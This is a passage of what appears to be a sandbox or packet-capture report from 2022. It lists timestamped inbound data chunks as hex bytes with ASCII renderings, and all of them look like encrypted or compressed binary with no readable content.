fZYTEXl&@TpO0->OL;Q;1"~f'/TC^}r0uw[j"ks.,k>Fk6@;Nhdx,;~XTv:bF6sGkS3I@On#=LFYdlo}<E017\|\|x~+*\77[0'Uf
2022-11-29 21:48:57 UTC	16	IN	Data Raw: 57 12 f7 0c b5 7e 68 c5 11 fd 47 1a d9 1e 30 91 e9 0e 34 92 d4 7e 19 06 0f 31 e4 5a 69 5d 7d aa bf 42 48 02 8e 19 5d 07 3c 63 2d d0 2a 47 de 9d 16 bf f9 1e 9b bf 1a 9f fb 20 0a a3 19 2a 89 93 e3 11 85 25 c9 61 80 b2 b6 97 18 ba 4a 2d 5e 7c 58 c0 4d 62 87 4e 4b 7b f5 3b 31 bc e9 b0 f0 ab 21 28 57 82 1f e0 96 0c 0d 09 5b a3 b8 ac 8a 92 6b 16 9a 80 0c 31 1e ab 47 58 d4 83 7b c4 2f 61 1b 82 af 59 c8 bc 59 2c a0 ee 2c bb 01 cf 89 29 42 75 dc 08 58 0f 51 26 20 14 00 a2 ac cf 69 f3 74 35 2f 27 c1 36 f7 6b 29 a3 05 49 b4 6f 8c 61 e1 a6 98 64 bc 5a 58 a3 b5 82 59 e4 0e aa 44 74 ec 72 12 9e 09 8e 6d c1 f1 24 57 5e 01 77 51 29 70 07 3c 64 b2 74 44 ae 35 0a b7 11 d4 31 b9 12 66 02 ff bb 27 2f ae dc b8 e4 42 11 49 fc 9f c3 32 c3 7d 63 b4 05 2e be dd bd 38 02 07 cb 7f Data Ascii: W~hG04~1Zi]}BH]<c-G %aJ-^\|XMbNK{;1!(W[k1GX{/aYY,,)BuXQ& it5/'6k)IoadZXYDtrm$W^wQ)p<dtD51f'/BI2}c.8
2022-11-29 21:48:57 UTC	17	IN	Data Raw: 13 ac 92 54 8f ae 73 35 c2 d3 39 eb 28 8c 85 6c 3f d9 68 7c 8f 26 b7 17 ee c0 6d ea 96 2a 56 be 3b eb 21 9d fd 34 bc f3 e8 bb 79 62 53 49 d5 10 be a7 0d 5c 1a f8 f1 f3 43 82 90 69 4e f4 fa 29 d9 3a 75 d6 3a 00 a8 4b 54 00 a4 7c d8 f8 26 02 fb e7 15 10 35 68 59 62 11 e0 30 ed d1 60 4d 81 bb af 76 04 a6 28 72 80 66 5f d5 5f 9f 07 c6 03 98 52 63 e4 a6 ab ee f6 45 d6 cd 02 e4 43 d2 b7 ac bc c4 e1 b9 cb 4a c7 7d 07 09 7d 04 4f f2 dc 96 dc 4d 01 58 de 5a 8d 71 a5 b3 25 50 f0 d4 54 87 fa 96 a0 ab fd 46 78 c4 96 4f eb 06 d4 d2 e3 7c 5c 14 fc 16 aa a8 9b e9 05 89 43 08 db 32 bd 89 e9 04 18 27 d5 7f 1f 24 5c ef fb 59 7b 37 5d 83 b0 bc 4f 08 57 12 6f 36 9e 7c 37 f4 12 4f c8 69 c9 93 d1 09 97 bf 13 90 e9 de 0b 8f 1b 01 dc fb 90 e3 60 da e3 60 93 82 ae a7 96 ba 81 2d Data Ascii: Ts59(l?h\|&m*V;!4ybSI\CiN):u:KT\|&5hYb0`Mv(rf__RcECJ}}OMXZq%PTFxO\|\C2'$\Y{7]OWo6\|7Oi``-
2022-11-29 21:48:57 UTC	18	IN	Data Raw: 31 a9 24 ed 99 59 16 27 46 d9 81 66 6e a6 c6 ec c7 41 d3 b0 c3 2f a4 e6 73 82 04 f9 c1 4a f8 45 86 78 ef c8 69 37 51 cc f2 6c 41 ee fb c7 89 fd 66 c8 24 f7 9a 73 47 7f 21 87 ae aa 04 b8 5d 8b f4 80 5b ce ff 9e 14 09 9b 1c 9e bb a4 19 15 fe ed dc b4 2c bf 0f 29 27 5b 56 d2 05 ce 07 e6 fc b5 54 ac 8f 61 ff 9d 4e cc 09 45 50 f0 0f 09 16 f4 c6 fd 35 3b 25 99 97 09 bc 14 ec 97 9a e5 16 f5 75 41 08 5e f2 79 9a c7 2c a9 d1 bf f8 23 fa a2 f3 17 b6 bf fb 5d 00 66 28 c4 c7 c1 ee 75 80 29 26 8f cf bd f4 81 25 f4 53 13 89 12 19 9c 7c 7e 34 c7 61 ab 78 bf 9a e2 e2 c8 36 fd ae 71 7a 95 01 15 6a 67 b9 4d cd 94 e9 ca 67 df 9a 2a 4f 8b 8d ea 0d 8f 7b 3c 92 f1 ec c3 4b 4a 7d 4d f9 24 d6 bf b2 5c 1e ef dc e7 3d af 8f 64 b4 7b 61 34 ef 0e 75 70 38 00 a8 c4 4e d3 fb 7b d0 e2 Data Ascii: 1$Y'FfnA/sJExi7QlAf$sG!][,)'[VTaNEP5;%uA^y,#]f(u)&%S\|~4ax6qzjgMg*O{<KJ}M$\=d{a4up8N{
2022-11-29 21:48:57 UTC	20	IN	Data Raw: 59 72 b0 17 50 b7 f1 b4 14 ec ec c9 75 17 72 6e 23 59 e5 77 92 07 6e e2 0a 8e 97 6b b0 8a 8e a7 8e 78 ae 1f f0 2c fa e5 1f 44 c9 00 fd a5 b1 03 59 45 49 9b 68 dc bb e2 94 65 7e 39 2c 1f 72 20 bb 9d f8 7e 05 c2 fa b6 ec 58 59 0d eb 98 75 a0 32 17 d4 85 db 0f 70 e4 e4 dd c3 e1 62 4c be 03 36 82 78 6e d6 1e a1 a8 69 01 b7 60 a7 a0 64 35 0c 1d 6f 51 d1 9e 6a 61 dc b8 61 1e a3 a2 27 4c 42 c1 2a 93 64 97 b5 74 4f c4 89 01 1b 08 ba 31 97 96 48 9f 36 ec 0f b6 f4 f9 96 3f 7c 0c ad 7f d2 7e f3 78 2d f1 36 77 2d 45 c5 dc 5c 3d c6 93 c3 36 ab 3d 5f 8f 73 10 48 5b e8 82 6c ae a9 c7 ec e3 57 2d a0 8a 3e bf cc 18 83 12 07 c0 04 fe 7e dc 79 c3 d6 91 59 4b 33 f3 39 3d eb 5e c7 8d f5 02 df 1a 27 9b 2c 61 03 dd 0a 13 dd 04 b9 32 86 e6 84 51 b0 f7 85 ea 02 9f 06 a5 d0 a2 76 Data Ascii: YrPurn#Ywnkx,DYEIhe~9,r ~XYu2pbL6xni`d5oQjaa'LB*dtO1H6?\|~x-6w-E\=6=_sH[lW->~yYK39=^',a2Qv
2022-11-29 21:48:57 UTC	21	IN	Data Raw: 0e 84 25 d8 7b 8c 9f 4b 96 be b1 5b 26 47 6c 8e c2 50 76 a1 21 50 7b e4 20 29 b9 e9 b0 f0 b8 0a 27 78 af 0f e9 87 00 06 e7 35 95 b2 ae ef 4a 64 09 8d 85 24 06 14 bb 58 7b 37 7c 56 fc 0c 7a 0c 81 ca af d9 b7 42 02 d1 ff 2d bc 10 3c 97 20 59 46 f2 1b 43 16 65 c4 2a 38 09 b8 43 c5 6d e3 76 23 17 02 d6 22 e8 7f 2e 5d 15 7e a6 58 1d ab cd a1 83 7e 87 8c 6c 9a b3 89 48 f8 06 5b bb 59 c2 60 08 95 10 4e 80 cb c2 36 53 4e 01 61 54 c8 45 d5 3f 63 a5 64 22 50 ca ff a0 3e bb 2a ab 22 6e 11 7f a4 12 3c 92 dc a9 ee 4b 21 b3 c5 33 c9 23 c8 67 a4 a3 16 cf 9b e2 af 10 20 1c d4 5e e9 71 5d 51 7b f7 13 4c 14 65 f9 0e 93 8f 6b a7 b9 b5 8b 70 73 02 02 d8 35 ff 38 d8 44 d8 0b ee a2 a7 2a 41 3b 4b 88 7f c7 be fe 8c 65 69 0a 17 0a 8c 2b 17 9f e9 75 1b c9 46 bf f3 4e 48 09 91 ba Data Ascii: %{K[&GlPv!P{ )'x5Jd$X{7\|VzB-< YFCe8Cmv#".]~X~lH[Y`N6SNaTE?cd"P>"n<K!3#g ^q]Q{Lekps58D*A;Kei+uFNH
2022-11-29 21:48:57 UTC	22	IN	Data Raw: 23 5d 3a 30 20 a0 69 4b 0e e8 e3 d0 e2 d8 00 c6 f8 7c 1a d3 6a 53 0b 1a 09 32 e7 ff 5d 37 81 bd b6 68 0e be 39 6a 9f b0 0e f9 5d 81 18 d4 0c ec 8f 62 c8 b4 83 ea f6 65 90 f9 20 e5 43 d8 d8 ae bd 34 d4 ea fa d5 c7 75 16 40 6b fe d1 df f4 7f df 5e 14 61 26 49 9e 70 a6 ea 25 50 fa de 48 8b da de e4 89 27 46 54 c4 a2 e7 ff 06 de d7 c0 7a 54 18 fa 71 aa 57 9a cf 3d e5 5a 0c ca 25 c5 89 c1 55 1c 48 d0 6d 18 f3 db 31 e4 50 66 33 44 8f b9 5b 66 75 50 15 73 23 3b be bf f8 12 47 f6 a0 c8 bf d9 36 a3 bf 1b 85 26 a2 0a a3 19 22 f9 c7 63 1d 9f 16 b3 63 82 8e da b5 93 ba 40 42 75 7d 58 db 73 3b bf 32 4d 68 e2 2a 21 b4 07 b9 f4 fd 22 3e 7f bc 10 ec fa 28 17 f7 5a 8f b3 ae c5 19 30 35 90 96 3f 06 05 a0 b7 60 90 55 e9 e8 24 69 ba 96 16 20 e3 bc 53 07 ad f3 3d a9 0b 27 8f Data Ascii: #]:0 iK\|jS2]7h9j]be C4u@k^a&Ip%PH'FTzTqW=Z%UHm1Pf3D[fuPs#;G6&"cc@Bu}Xs;2Mh*!">(Z05?`U$i S='
2022-11-29 21:48:57 UTC	24	IN	Data Raw: 97 57 ce f7 92 fb 0d 9f 05 a6 d0 ae bb 04 e9 ed d3 a5 36 af 02 c0 ab 58 59 c4 7a f8 0a f7 f5 2d f4 27 44 61 db 22 5d c8 03 45 59 f1 61 24 31 e6 d5 f8 ab 13 25 9d 8b fd ae 3d 9d 92 b0 f8 1e fc ab 5c 1d 4e 20 7f a7 dc 3d dc d1 bf f6 d7 f7 b2 f4 35 8c d0 fb 5b 01 65 42 ff c2 c1 f5 62 9f c6 2e b2 cb c5 c0 84 25 ef 5b d0 7b 02 3c b2 50 6a 05 ce c9 54 87 bd 51 3c c4 c0 3f c3 cc 92 85 6a 15 3f 84 7c d9 77 cc 1b ee ca 67 f0 98 2a 05 a2 c9 8d 0c 85 fb 1c 92 f1 fb 8d 6a 4a 14 49 d5 1a 90 9c b2 4d 0c f4 c4 9e 43 82 96 9a b1 d9 d8 20 c8 25 4b 38 b6 b7 86 d3 4a 0e a2 66 dc e2 d0 14 29 f5 3f 3a ca 66 59 6c 21 f6 33 c1 c4 0d b9 36 b8 2b cb c9 bd f2 6d 41 15 75 f9 5d 86 00 df 07 80 a4 78 36 b5 af fa f5 53 d7 a0 8d 52 40 56 6f 86 87 c5 eb b9 c9 4a c7 7d 0a 09 7d 04 5e e3 Data Ascii: W6XYz-'Da"]EYa$1%=\N =5[eBb.%[{<PjTQ<?j?\|wg*jJIMC %K8Jf)?:fYl!36+mAu]x6SR@VoJ}}^
2022-11-29 21:48:57 UTC	25	IN	Data Raw: 97 f8 7e f4 1f 55 b4 10 5a 5b 12 9d ab 6c de 3a 17 d4 81 f1 1f 73 e4 48 f6 e7 e1 4d 46 3e 0b ef 81 7c b3 4b 1c a1 a8 6b 1e cc 53 be de 6c 35 0a 19 47 40 39 9d 6c 49 09 bb 61 14 2c aa 27 4c 5c 1c 59 90 77 a7 b2 6b e0 f7 90 7f 29 08 ba 24 a9 d9 4e a7 b0 c4 2b b6 f4 e2 12 2c 82 0d 85 b2 80 6b 99 a2 b2 e2 e0 fa 00 2a cb dc 50 2b ba 87 c2 27 a5 02 a5 8e 5f 15 3f 46 ed 82 77 c5 be 38 ed c5 47 cc c1 d8 25 b3 da e6 93 00 e5 3f 5a d0 51 7a 70 a9 de 79 32 5a e5 b2 67 3f c1 e6 d4 89 f5 ed da 16 27 9b 5f 45 60 c0 a6 41 d0 1f ab 59 97 f6 80 42 21 fa a8 e1 0a be 3c e7 d1 a4 13 1e ff ed dc b4 2c bf 00 29 27 5b 5a d3 68 ef 07 f7 fc 26 1d ba 79 6e d8 82 65 b3 f6 ab ab ef db 08 29 c7 d2 ee 46 3f 34 9d b0 f7 bd 29 ff 93 bf c0 66 f5 75 50 0c 57 03 67 a2 2a 53 a7 dc ae f0 1d Data Ascii: ~UZ[l:sHMF>\|KkSl5G@9lIa,'L\Ywk)$N+,kP+'_?Fw8G%?ZQzpy2Zg?'_E`AYB!<,)'[Zh&yne)F?4)fuPWgS
2022-11-29 21:48:57 UTC	26	IN	Data Raw: 3f 52 ce c8 76 06 be e7 06 bc 01 01 80 05 1a 5d f2 0a 64 09 7b 2b 03 0b 04 ba 54 e6 8f f5 77 29 35 31 db 3d f1 44 11 5d 04 6f b4 7f e0 be f2 a2 80 63 9a 81 5b 9f bb 8c 4b e6 0f 47 43 4a e8 7e 0a 99 1c 9f 85 e8 87 26 40 53 27 77 67 91 70 2b 34 45 69 5c 1e 79 fd f5 b1 31 d8 25 a0 0a 5c 02 66 b1 f9 2f 8f f6 b9 e5 54 02 4d c4 1f c3 0c fd 7d 62 aa 1d d0 be ea 84 13 31 8d cb 75 17 4d 71 5b 7b d4 31 9a 07 64 f1 2e 98 87 6f b4 d1 ed a6 8e 78 24 0e e3 28 f8 57 84 46 c9 0a 90 99 c9 30 4a 30 9f c5 61 cf cb fb 9a 20 7d 11 08 1f 72 2a 3b 95 38 81 fe e0 92 4b 13 a7 8a ed 6e 54 8c 21 c5 e8 0a b2 e2 1b 7e ec a7 f7 e7 e1 62 46 3e 0b 36 4d 83 4c b8 c2 81 dd 71 1e cc 52 aa 20 6f 3d 1a e7 44 1f db 88 92 48 a7 46 70 60 39 aa 27 4d 6e 2b 59 91 6e 49 7a 4b 5c f7 9a ff 3b 40 bb Data Ascii: ?Rv]d{+Tw)51=D]oc[KGCJ~&@S'wgp+4Ei\y1%\f/TM}b1uMq[{1d.ox$(WF0J0a }r*;8KnT!~bF>6MLqR o=DHFp`9'Mn+YnIzK\;@
2022-11-29 21:48:57 UTC	28	IN	Data Raw: c4 eb b3 d6 46 d1 6f 1c fb 66 28 5c f5 ef 4f db 4d d6 71 34 58 c8 77 ca d8 27 55 81 3f 48 8b fe b6 c9 a1 03 41 3b 99 8b c2 f4 20 f4 2c e8 63 57 95 d7 1e b4 57 96 c7 19 98 13 09 db 3c db bf e2 24 19 48 d6 fe 15 f3 ec 30 e4 50 7f 21 c4 87 91 49 6e 21 50 15 f5 3a e1 ef 26 f8 12 4f c9 06 d0 8c 8a 1b e0 5e 1b 8f ff 0d 01 83 1c 2a d9 43 e9 c0 ec 24 c9 60 91 87 ce 75 92 ba 4e 42 01 7d 58 db 7d 6b b7 5d 13 7a f5 31 2e 8b 1c 91 d9 ad 22 be 73 72 54 ea 96 0b 1f e1 cb 98 9d a5 c5 5c 6b 16 10 9c e2 46 04 a0 47 57 de ec 6c c6 2f 43 0f 81 c0 2d c2 61 7c 07 be e5 07 ad 12 26 19 13 64 56 d2 08 58 09 fb 30 f6 08 06 ba 52 c0 41 d9 5e 20 35 63 d8 3d f1 75 06 7d 0a 61 ba 02 7d ab e1 a0 81 63 9d 97 77 8e b2 83 84 19 19 54 45 49 ea 05 0c 9e 0e 92 6d cb dc 26 42 42 02 58 3d d7 Data Ascii: Fof(\OMq4Xw'U?HA; ,cWW<$H0P!In!P:&O^*C$`uNB}X}k]z1."srT\kFGWl/C-a\|&dVX0RA^ 5c=u}a}cwTEIm&BBX=
2022-11-29 21:48:57 UTC	29	IN	Data Raw: 59 1a 50 90 71 a1 c3 ce 82 c6 97 55 0b fe a9 d5 00 ca d4 fb 4c 0e 77 cf d6 ef ed f9 65 be ff 24 a3 ca b2 6a 82 25 e5 56 05 70 05 1d b7 54 7b 0a 03 99 43 af 9d 8e 34 e8 62 38 d7 d9 9a 92 42 be 3f 6a 76 af 55 de 13 ee db 63 e6 64 2b 72 a0 d2 f9 09 89 ea 18 8d fb 16 bc 43 48 56 4c ed cc 56 63 4d 76 1a e3 df fb 43 57 8e 64 b0 bf d6 22 cf 0a 73 39 38 06 86 92 4b 0e a2 6f c2 f0 ca 2b 89 f5 13 32 c1 79 4b 77 11 27 31 ed d1 27 68 80 bb af 54 3b aa 28 70 9d b0 3e f8 5d 8d 23 f6 08 80 aa 64 e0 85 80 ea f0 6d f7 a2 03 ef 2c 42 d8 ae b7 cf e9 9b 9b 46 c7 7f 68 c4 7c 28 5d e7 fc 6e d6 65 35 73 34 5e 8b 5f ee c9 25 5a 95 26 48 8b f0 8f b7 89 e2 45 54 c8 e5 92 fe 06 de c2 e0 74 38 54 fc 1e be 47 92 ed 5b f7 4b 02 b4 7d c3 91 e3 15 14 27 2c 7e 1f 24 62 37 cc 63 74 37 53 Data Ascii: YPqULwe$j%VpT{C4b8B?jvUcd+rCHVLVcMvCWd"s98Ko+2yKw'1'hT;(p>]#dm,BFh\|(]ne5s4^_%Z&HETt8TG[K}',~$b7ct7S
2022-11-29 21:48:57 UTC	30	IN	Data Raw: 48 94 7c f8 99 6a 6f fd 81 7a 0b 67 95 34 bf c0 42 9c 5f 5e 2b b6 fe e0 12 26 79 63 c1 a3 87 76 e0 7f 14 f2 27 73 3d 3b cf 53 eb 58 98 82 c2 3c aa cb 41 9e 76 79 4e 54 e9 88 6f ae cc c7 ec e3 9d 0d ab dc 10 a6 d7 89 d5 04 f9 cb 87 fb 76 00 79 c3 dc 45 58 5d cd f3 7a 3f cb f9 c7 cb f5 e6 be 0c d7 9a 73 4d 69 dd 86 99 dd 66 c8 5d 9d e7 84 5b df e0 b4 ee 08 cd 14 a6 d0 e9 19 15 f4 ea d3 c7 5b ba 16 dd 2a 04 3e c5 7b e1 0a e4 83 73 e3 bb 51 7f f5 f4 76 c9 09 5e 47 e2 e0 0d 2b f1 b1 c2 30 3b 3e 8c 8e ef d2 16 e8 80 ba e9 00 e9 1a 7f 0d 46 06 7b 9e bf 53 8b db ac f8 1a fb cc c3 1c d9 da e8 5a 1b 6b 20 d3 d5 d0 fb ff 21 b8 16 a2 cc a0 ec 5b 3f f4 52 61 1e 12 35 94 5e 14 66 a0 9e 5e 5b 69 87 3d c2 c6 36 ac 9a 8e 85 60 cb 37 6d 13 92 48 cd 1d c4 ca 67 f1 86 2a 5e Data Ascii: H\|jozg4B_^+&ycv's=;SX<AvyNTovyEX]z?sMif][[>{sQv^G+0;>F{SZk ![?Ra5^f^[i=6`7mHg^
2022-11-29 21:48:57 UTC	32	IN	Data Raw: d2 6a 53 66 3b 2d cc ea 4b 0f 37 87 c8 02 7c 1f ac 55 2e 97 98 5a fb 23 f0 0a c6 01 fd f9 62 c8 b0 a9 b0 88 09 d0 a2 07 e7 6b b4 d9 ae b7 b0 f9 b3 d2 44 47 39 1c f7 78 02 06 8a b8 7f de 49 05 58 59 59 8d 7d be db 25 50 f8 5e 04 8b fa 9a 95 fb 7d 0a 54 ce 8e c0 d6 6a d5 d3 e2 17 44 18 fc 1c 34 1b 9a c5 15 dd 11 76 96 36 c3 95 eb 2c 71 49 d6 74 6b 3d 71 31 e6 d0 3a 37 55 98 95 51 7e 20 50 a8 74 30 3c 2c 27 f8 03 51 cd 90 f0 22 d2 1e 9b bf 0a 88 e0 de 0b 8f 01 22 f9 c7 e2 1d 9f 0d dc 61 93 88 9d e1 93 ba 40 14 43 7d 58 d1 47 7a b8 32 5a 7c ec c5 37 89 12 b5 d0 b7 31 39 79 be 02 f3 68 0a 3b fd 59 99 f3 c8 e4 59 6b 0f 83 91 3f 17 02 b7 b9 5e e5 7e 62 fb 23 63 1c 86 df a0 36 bd 7f 0d af e3 15 f4 1b 31 88 1a 44 4e f5 0a 49 0e 67 c4 2a 38 0e c4 1e ce 45 f1 7a 3e Data Ascii: jSf;-K7\|U.Z#bkDG9xIXYY}%P^}TjD4v6,qItk=q1:7UQ~ Pt0<,'Q""a@C}XGz2Z\|719yh;YYk?^~b#c61DNIg*8Ez>
2022-11-29 21:48:57 UTC	33	IN	Data Raw: b1 10 ff 67 74 59 c2 05 8b 07 e6 fc 13 57 b9 55 6a db 47 5d c8 03 3b 6b e6 f1 02 3c df 43 ec 31 3d 4a fd 8b f7 b9 10 77 82 b0 fe 2d 31 75 50 06 29 33 79 b6 de 54 a3 7e bd fc 0d 80 c3 f3 1d dd f8 4b 5f 0a 6a 19 17 c3 c1 f5 1e a9 d6 27 a9 ca 82 72 87 25 e3 29 6e 77 13 31 b6 c1 79 0c a7 b6 94 87 b7 87 5b d1 c1 3f c9 cb a6 30 68 17 39 14 1d 89 49 c9 3f 58 c8 67 f6 b2 ea 5e a3 cf 85 32 88 fb 16 94 d9 4f bf 6f 4c 03 29 d5 1a ac b4 1a 5e 1a fe c7 3f 43 8a 85 0b 8f f4 d6 28 d8 0a e4 38 38 06 d0 89 4b 0e ac 54 6a e0 d8 05 ff 34 13 38 d8 05 66 65 39 02 34 c5 7a 0d 37 87 c5 c5 7c 1f ae 00 d4 95 98 58 d1 9d 87 0b cc 64 bf ad 62 c2 b2 ab 5d f4 45 d6 dc 63 e5 43 dc f0 16 bf c4 ed 9b 12 46 c7 7f 73 c8 7d 28 56 f2 dc 3d dd 4d 01 0e 54 58 8d 73 e2 8a 26 50 fc f6 88 8b fa Data Ascii: gtYWUjG];k<C1=Jw-1uP)3yT~K_j'r%)nw1y[?0h9I?Xg^2OoL)^?C(88KTj48fe94z7\|Xdb]EcCFs}(V=MTXs&P
2022-11-29 21:48:57 UTC	34	IN	Data Raw: e6 1f 73 e5 f1 f1 f6 e5 74 38 5d 0b 36 86 de a2 43 0b 89 88 68 1e ca f1 af da 74 36 ae 08 43 59 fa be 6f 49 fe 1a 70 10 39 ac 85 5d 42 07 71 b1 67 97 b1 c9 7e f3 8c 7d 3b 3d bb 35 b5 68 5b 9b 18 b9 2b b6 fe ff 1e 1f 4d 0c a9 a8 aa 7b f1 70 2d 7d 37 77 21 f4 c5 f8 74 00 a9 83 c8 3b 89 2d 5b 8f 79 c8 27 7f e9 82 27 dd a6 c6 ec e9 41 d3 a1 d5 3c a0 dd e7 82 04 fa c0 5b fc 50 78 79 c3 cc 6f 58 5c d6 c2 62 3f 55 fb c7 8d a3 fc de 1d aa 24 73 4d 63 d5 ae f7 de 04 be 2e 1e e6 84 51 dd d3 e5 e9 08 b1 3c 82 d0 a4 13 3d 72 fe d8 be 52 31 17 d7 2c 18 d2 c5 7b e1 14 e2 d3 14 f2 bf 3a a8 f3 87 57 bc bb 54 54 e6 fd 0e 38 ff b1 62 30 3b 3e 8a e4 7a bc 38 e3 ef 3e f9 05 fb 5d 70 0f 46 0a 50 91 d4 52 81 be 71 fc 0b f4 b2 f7 72 10 d0 fb 57 27 a4 ef fa d2 c5 8a 4a 96 d7 26 Data Ascii: st8]6Cht6CYoIp9]Bqg~};=5h[+M{p-}7w!t;-[y''A<[PxyoX\b?U$sMc.Q<=rR1,{:WTT8b0;>z8>]pFPRqrW'J&
2022-11-29 21:48:57 UTC	36	IN	Data Raw: 05 a5 34 03 23 07 ba 58 da 4e dd 4f 23 1d 1b 06 50 e6 6b 5a 94 04 65 b3 40 5b 74 f7 b7 95 12 b7 93 5a 88 84 85 48 e4 6c 6f 45 58 ef 05 4e 9e 0e 92 4f c8 c9 d8 41 43 ff 71 47 59 c6 30 c0 4d e8 60 01 59 44 42 ad e1 c3 e7 27 09 64 02 67 a8 22 27 92 cd bd e3 5c 8c fa df c5 eb 2e c2 7d 78 a1 18 c4 a9 d9 23 11 31 0d c0 ab 04 55 59 6c 6a fc 03 89 01 7a ed 0a b8 94 6b bc 7c a8 b3 a4 75 04 17 f0 2c ff 10 d2 46 c9 00 a5 ba d2 44 40 35 5b 9b 68 d9 91 ed a3 65 21 9c 08 09 72 2a 3b 95 f8 7e d1 1f 59 68 ec 49 41 12 91 aa 77 ee 3d 17 3a 81 f3 1f 29 e4 e2 e4 f8 ed ef 6d 3e 0b 37 91 74 a2 4f 0a b7 34 7a 16 db 45 22 cf 64 2d 1a 85 56 48 cb 88 f0 58 f0 a2 77 88 32 a2 3c 5a da 0d 51 8d 72 0b a6 63 72 e1 0c 6e 1b 16 ac a9 ae c2 55 96 26 58 3a be eb f9 00 ab 6d 04 b6 a9 91 e0 Data Ascii: 4#XNO#PkZe@[tZHloEXNOACqGY0M`YDB'dg"'\.}x#1UYljzk\|u,FD@5[he!r*;~YhIAw=:)m>7tO4zE"d-VHXw2<ZQrcrnU&X:m
2022-11-29 21:48:57 UTC	37	IN	Data Raw: 34 52 53 79 ef e1 12 50 fa d4 44 a3 c2 9e bf ab dd 47 52 b0 a0 c3 fe 02 fc c4 ea 63 51 30 b4 1d b4 50 b2 dc 13 f7 4d 67 13 36 c3 9b 37 0a 39 60 e1 7e 1f 24 7c 19 dc 50 77 3d 8b 9c b9 68 4f 38 50 15 75 30 3a 63 3b da 12 49 c4 97 c8 be d3 1e ab bf 07 c3 fb 2e 10 a3 19 2b c2 f3 eb 1d d2 20 c9 60 cc 82 b5 86 e1 06 4a 2d 5c 76 5e f9 9f 69 bf 34 24 b3 f5 3b 3c 8d 8f b0 dc a7 4d a7 78 af 0f f8 93 1a 12 e3 72 ff b0 ae e3 4f e6 11 90 96 3e 12 11 b4 6f fa c9 7d 70 c0 35 63 0d 8b cd bc cd a8 7b 77 bd e5 2a aa 97 36 88 05 4b 49 e6 1e 70 ac 7b 3a 21 3c 16 ba 52 c4 56 f1 7e 3f 91 2e d8 3d f6 7a 1d c7 05 65 b3 41 fd bb e5 be 1e 58 8c 93 5b 9f 80 13 58 e3 13 78 4b 88 a7 6a 19 9c 26 8c 93 c0 d7 35 47 7e 0d a0 05 d7 71 29 16 5b b7 4c 31 42 cd e3 a2 33 aa 46 ab 22 6e 11 6f Data Ascii: 4RSyPDGRcQ0PMg679`~$\|Pw=hO8Pu0:c;I.+ `J-\v^i4$;<MxrO>o}p5c{w*6KIp{:!<RV~?.=zeAX[XxKj&5G~q)[L1B3F"no
2022-11-29 21:48:57 UTC	38	IN	Data Raw: fb 5b 1b 4d 19 5f c0 c1 f9 1e bc d5 27 a5 ca bb c6 ea 38 e4 57 04 a9 1c 10 b6 60 7b 0c ab 8d 73 af 8f 8d 34 e4 1e 3f d2 de 99 53 79 04 2e 79 6d a2 77 b8 ea 11 35 76 fb 8d fc 4d a8 d4 e1 1c a3 c5 9d 6e 0e 17 63 60 6f 55 7e d5 1a a2 8f 9a 74 22 f8 ef f5 9d 8a 89 4e b7 df d6 22 de 63 69 3a 38 00 ae e9 4b 90 aa 7c d0 8f da 03 d7 ff 16 38 d2 65 59 64 39 12 32 ed d6 0f 37 81 bb b4 7c 1f aa 01 7f 97 98 64 fc 5d 87 04 c6 0b 80 b6 62 c8 b5 90 da f1 45 c3 a1 03 e5 23 d8 d8 bf ab d7 e1 8b d1 45 c7 75 1c e6 76 37 45 0a f5 53 d7 75 fd 72 34 58 92 6d d9 c3 25 41 f0 c1 52 75 fb b2 b3 a7 2b ef 55 ce 80 d1 f6 19 cf c0 e2 63 46 12 e3 15 4a 57 b6 d4 17 df e2 09 db 3c 4f ba e9 04 1d 5b d3 61 13 3d 7b 31 f5 5a 68 39 ab 9d 93 53 48 0c fa 14 75 3a b0 a3 27 f8 13 54 db 88 c7 ac Data Ascii: [M_'8W`{s4?Sy.ymw5vMnc`oU~t"N"ci:8K\|8eYd927\|d]bE#Euv7ESur4Xm%ARu+UcFJW<O[a={1Zh9SHu:'T
2022-11-29 21:48:57 UTC	40	IN	Data Raw: d5 2e a1 22 e0 13 26 79 1d af 2c 30 4e 3d 70 2d b1 35 77 2d 02 5b de 5c 31 81 36 c2 36 a7 1f 85 9a 56 3e 10 55 e9 88 75 c5 d5 7a ec e9 4b d9 89 ed 3c a0 d4 38 82 02 d3 c0 4b fc 5e 78 79 c3 d6 1a 2d 5d d8 e8 66 3f ca e0 f7 89 f5 75 df 0c d9 f9 73 4d 78 c0 9a bf 60 04 b8 57 bf 76 87 5b d9 d3 a0 ea 08 bd 19 af f8 1d 19 15 e3 f5 ab 08 3d bb 1c dd 21 18 8c c4 7b e1 14 e9 ee 28 ed 83 18 6d f3 87 4c c7 18 5a ce f4 f5 19 3e df ef ee 31 31 19 98 b3 c5 bc 38 e9 91 b4 8b 88 f0 75 56 1f 41 d2 6a 93 fc 65 8b d1 b5 ef 03 d6 9b f3 1d d3 0d ee 5c 0a 6c 20 d0 eb ae fc 71 90 b8 a0 a2 cc ac ca 80 1d e7 56 0e 77 02 31 b6 c7 7a 0c ab f1 c7 86 b7 87 5b 7f c1 3f c9 e5 38 85 6a 11 2c 6f 02 1c 49 cd 1d fd cc 71 e1 9d 45 d6 a2 c5 ec 1a 53 e8 0c 81 f8 d0 7a 6f 4a 7d 58 d2 0b a1 b4 Data Ascii: ."&y,0N=p-5w-[\166V>UuzK<8K^xy-]f?usMx`Wv[=!{(mLZ>118uVAje\l qVw1z[?8j,oIqESzoJ}X
2022-11-29 21:48:57 UTC	41	IN	Data Raw: 3b 57 e2 4d b1 3b d2 22 a2 33 6c 16 98 ba 36 27 f7 49 b8 f5 5e 14 65 ea 1f c3 38 d5 83 73 d0 31 f5 ae f6 98 31 19 4b ca 75 1d 61 78 4a 66 d4 6f 99 07 68 89 a8 81 94 6d d9 38 aa a7 84 63 29 3f 47 2c fe 3e c1 4e d8 06 d7 2e c9 30 4a 16 02 8a 62 f0 07 ec 97 6f 55 2b 19 17 5e 1c 48 b7 fa 7e 07 0c 58 a5 e1 49 5d 7d b9 a9 6c d8 2b 1a c5 8b 9c 3b 71 e4 e4 e4 ea f0 6a 29 18 09 36 84 6d be 6f 5e a2 a8 6d 71 e6 51 be d8 6a 24 01 76 5a 41 d2 94 44 67 fa b8 67 07 2b 74 28 69 6e 2b 59 91 6e 84 b9 43 57 f7 90 75 cd 08 ab 39 a8 1c 59 93 21 c8 3a a5 ca 0f e8 c8 83 1d b8 b5 51 6f e2 69 14 e4 24 f9 9c 15 ad 23 a3 c8 af a9 c2 36 a1 14 47 8f 73 16 27 cb e9 89 cf c1 b4 dc ec e9 40 d3 a1 f8 3d 67 2a e7 8d 1e f9 c1 5a ef 6e 